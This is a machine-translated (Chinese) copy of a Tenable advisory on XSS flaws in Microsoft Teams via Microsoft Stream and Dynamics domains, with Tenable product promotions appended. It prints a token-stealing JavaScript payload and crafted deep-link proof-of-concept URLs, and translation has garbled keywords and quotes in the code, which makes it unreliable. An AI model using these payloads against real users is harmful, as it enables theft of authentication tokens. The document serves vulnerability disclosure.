脸谱网 Google + 推特 LinkedIn YouTube RSS 菜单 搜索 资源——博客 资源-网络研讨会 资源-报告 资源-事件 icons_066 icons_067 icons_068 icons_069 icons_070

跨站点脚本在微软团队通过动力学和微软域

媒介

剧情简介

站得住脚的研究员发现很多问题导致跨站脚本(XSS)漏洞的上下文中被触发微软团队web和桌面客户端,这可能导致身份验证令牌的盗窃为微软团队和其他微软服务。

背景

正如//www.yyueer.com/security/research/tra - 2023 - 6XSS,有效的完全受信任的应用程序域微软团队可以导致一个一键链接可以窃取身份验证令牌的各种微软服务(取决于连接受影响的受害者已经使他们的团队账户)。

这是可能的,完全受信任应用程序能够使用javascriptpostMessage请求的身份验证令牌,通常用于验证所使用的服务应用程序。此外,由于受信任应用程序可以打开预览窗口通过有效域任务阶段深度链接,攻击者可以工艺恶意链接,当点击一个团队web或桌面客户端将执行XSS载荷。

考虑以下负载,检查是否运行在web或桌面客户端,然后使用适当的函数为teams.microsoft.com请求身份验证令牌

如果(typeof initOnNativeMessageProxy = =“函数”){initOnNativeMessageProxy(函数(事件){警报(JSON.stringify (event.data.args))});nativeInterface.framelessPostMessage (' {" id ":“站不住脚”、“函数”:“身份验证。getAuthToken”、“参数”:[[" https://teams.microsoft.com "]]});其他}{receiveMessage函数(事件){警报(JSON.stringify (event.data.args))}窗口。addEventListener(“信息”,receiveMessage假);上面。postMessage ({" id ":“站不住脚”、“函数”:“身份验证。getAuthToken”、“参数”:[[" https://teams.microsoft.com "]]},“*”);}

XSS通过web.microsoftstream.com

一个反映XSS漏洞存在web.microsoft.com/waitingroom,因为它是可以欺骗的页面导航到一个攻击者的选择取决于数据的位置参数。

流应用程序团队允许任务深度链接,这意味着攻击者可以工艺团队内链接将打开一个窗口触发反映XSS负载。这个有效载荷通过javascript能够与团队沟通postMessage代表受害者的请求的身份验证令牌,并将它们返回给攻击者。

概念验证

数据参数的web.microsoft.com/waitingroom了base64编码的有效载荷的以下|分隔字符串:

https:// [attacker-controlled] . tld / streamtest testapi | javascript:警报(document.domain)什么| | | 0
  • 第一个url是一个attacker-controlled api与最初的回应选项补丁请求了候机室等你页面,检查一个特定的响应的一个非空值apiEndpoint。不管除了提供持续的执行没有错误的一种方式。候机室等你页面设置变量url与这个url。
  • 第二部分是窗口将导航到完成的地方。我们指定一个javascript uri将触发警报(document.domain)调用。在页面的代码
    window.location。href = unescape (“javascript % 3 aalert (document.domain) ");
  • 第二和第三部分为我们的目的(他们并不重要tenantId用户标识),所以我们组任何东西
  • 最后一节将0因为它决定了区间等导航之前我们的有效载荷。

而不是一个简单的alert ()有效载荷,攻击者可以工艺执行代码中提到的有效载荷背景部分,然后工艺团队深度链接页面,见下面的例子:

https://teams.microsoft.com/l/task/com.microsoftstream.embed.skypeteamstab?url=https: / /web.microsoftstream.com/waitingroom%3fdata%3d [malicious-data-parameter]

XSS通过.dynamics.com *

多个完全受信任的应用程序* . * .dynamics.com作为一个有效的域名。作为动态子域可以包含攻击者控制的内容,包括网页,触发反映XSS载荷,它是可能的攻击者恶意深度链接工艺可以请求代表受害者的身份验证令牌,并将它们返回给攻击者。

概念验证

攻击者可以创建一个页面xyz-attacker-controlled.svc.dynamics.com/f/w/maliciouspage例如,其中包含负载所示背景上面部分,然后工艺深度链接,团队内点击桌面或web客户端时,将触发有效负载中受害者的团队客户。


下面是两个例子这看起来的方式任务阶段深度链接:

https://teams.microsoft.com/l/task/ [affected-app-id] ? url = https://xyz-attacker-controlled.svc.dynamics.com/f/w/maliciouspage https://teams.microsoft.com/l/stage/ [affected-app-id] / 0 ?上下文= % 7 b % 22 contenturl % 3 22% % 22 https: / /xyz-attacker-controlled.svc.dynamics.com/f/w/maliciouspage%22%7d

解决方案

微软已经固定在受影响的应用程序的问题。

披露时间表

据报道,2023年4月6日——问题MSRC
2023年4月6日——微软证实
2023年6月6日,微软在web.microsoftstream.com修复问题
2023年7月12日,微软的.dynamics.com应用程序使用*的修复问题

交易报告内的所有信息提供了“是”,没有任何形式的保证,包括适销性的隐含保证和健身为特定目的,并没有保证的完整性、准确性、及时性。个人和组织负责评估任何实际或潜在的安全漏洞的影响。

站得住脚的非常重视产品安全。如果你认为你已经找到一个漏洞在一个我们的产品,我们要求您请与我们共同努力,快速解决它为了保护客户。站得住脚的相信迅速应对这样的报道,与研究人员保持沟通,并提供解决方案。

提交漏洞信息的更多细节,请参阅我们的漏洞报告指南页面。

如果你有问题或修正咨询,请电子邮件(电子邮件保护)

风险信息

成立咨询ID
交易- 2023 - 22所示
信贷
埃文·格兰特
CVSSv3基地/时间的分数
6.1
CVSSv3向量
AV: N /交流:L /公关:N / UI: R / S: C / C: L /我:L /答:N
受影响的产品
微软团队
web.microsoftstream.com
风险因素
媒介

咨询时间

2023年7月17日——咨询发布

站得住脚的脆弱性管理

以前Tenable.io


享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。

你站得住脚的脆弱性管理试验Lumin还包括成立,成立网络应用扫描和站得住脚的云安全。

站得住脚的脆弱性管理

以前Tenable.io

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。今天购买你的年度订阅。

65年资产

选择你的订阅选项:

现在购买

尝试成立Nessus专业免费的

免费7天

站得住脚的Nessus是当今市场上最全面的漏洞扫描器。

新成立Nessus专家
现在可用

Nessus专家增添了更多的功能,包括外部攻击表面扫描,和添加域和扫描云基础设施的能力。点击这里尝试Nessus专家。

填写下面的表格继续Nessus Pro的审判。

买站得住脚的Nessus专业

站得住脚的Nessus是当今市场上最全面的漏洞扫描器。站得住脚的Nessus专业将帮助自动化漏洞扫描过程,节省时间在你的合规周期,让你与你的团队。

买一个多年的许可并保存。高级支持访问添加到手机、社区和聊天支持一天24小时,一年365天。

选择您的许可

买一个多年的许可并保存。

添加的支持和培训

Tenable.io

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。

你站得住脚的脆弱性管理试验Lumin还包括成立,成立网络应用扫描和站得住脚的云安全。

Tenable.io

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。今天购买你的年度订阅。

65年资产

选择你的订阅选项:

现在购买

尝试站得住脚的Web应用程序扫描

以前Tenable.ioWeb Application Scanning

享受完全访问我们的最新的web应用程序扫描提供专为现代应用程序的一部分的一个管理平台。安全扫描整个在线组合漏洞具有高精确度没有重体力工作或中断关键web应用程序。现在报名。

你站得住脚的Web应用程序扫描试验还包括站得住脚的脆弱性管理,成立Lumin站得住脚的云安全。

买站得住脚的Web应用程序扫描

以前Tenable.ioWeb Application Scanning

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。今天购买你的年度订阅。

5 fqdn

3578美元

现在购买

尝试成立Lumin

可视化和探索你的风险管理,跟踪风险降低随着时间的推移和基准与站得住脚的Lumin你的同行。

你站得住脚的Lumin审判还包括站得住脚的脆弱性管理,站得住脚的Web应用程序扫描和站得住脚的云安全。

买站得住脚的Lumin

联系销售代表如何站得住脚的Lumin可以帮助你了解你的整个组织和管理网络的风险。

尝试站得住脚的云安全

以前Tenable.cs

享受完全访问检测和修复云基础设施配置错误和查看运行时的漏洞。现在注册你的免费试用。了解更多关于审判过程请点击这里。

你站得住脚的云安全试验还包括站得住脚的脆弱性管理,成立Lumin和站得住脚的Web应用程序扫描。

联系销售代表购买站得住脚的云安全

联系销售代表来了解更多关于站得住脚的云安全,看是多么容易机载云账户和获得可见性都几分钟内云配置错误和漏洞。

尝试成立Nessus专家免费

免费7天

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

已经成立Nessus专业吗?
升级到Nessus专家免费7天。

买站得住脚的Nessus专家

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

选择您的许可

买一个多年的执照和存更多的钱。

添加的支持和培训

尝试Nessus专家免费

免费7天

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

已经有了Nessus专业?
升级到Nessus专家免费7天。

买站得住脚的Nessus专家

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

选择您的许可

买一个多年的执照和存更多的钱。

添加的支持和培训

Baidu
map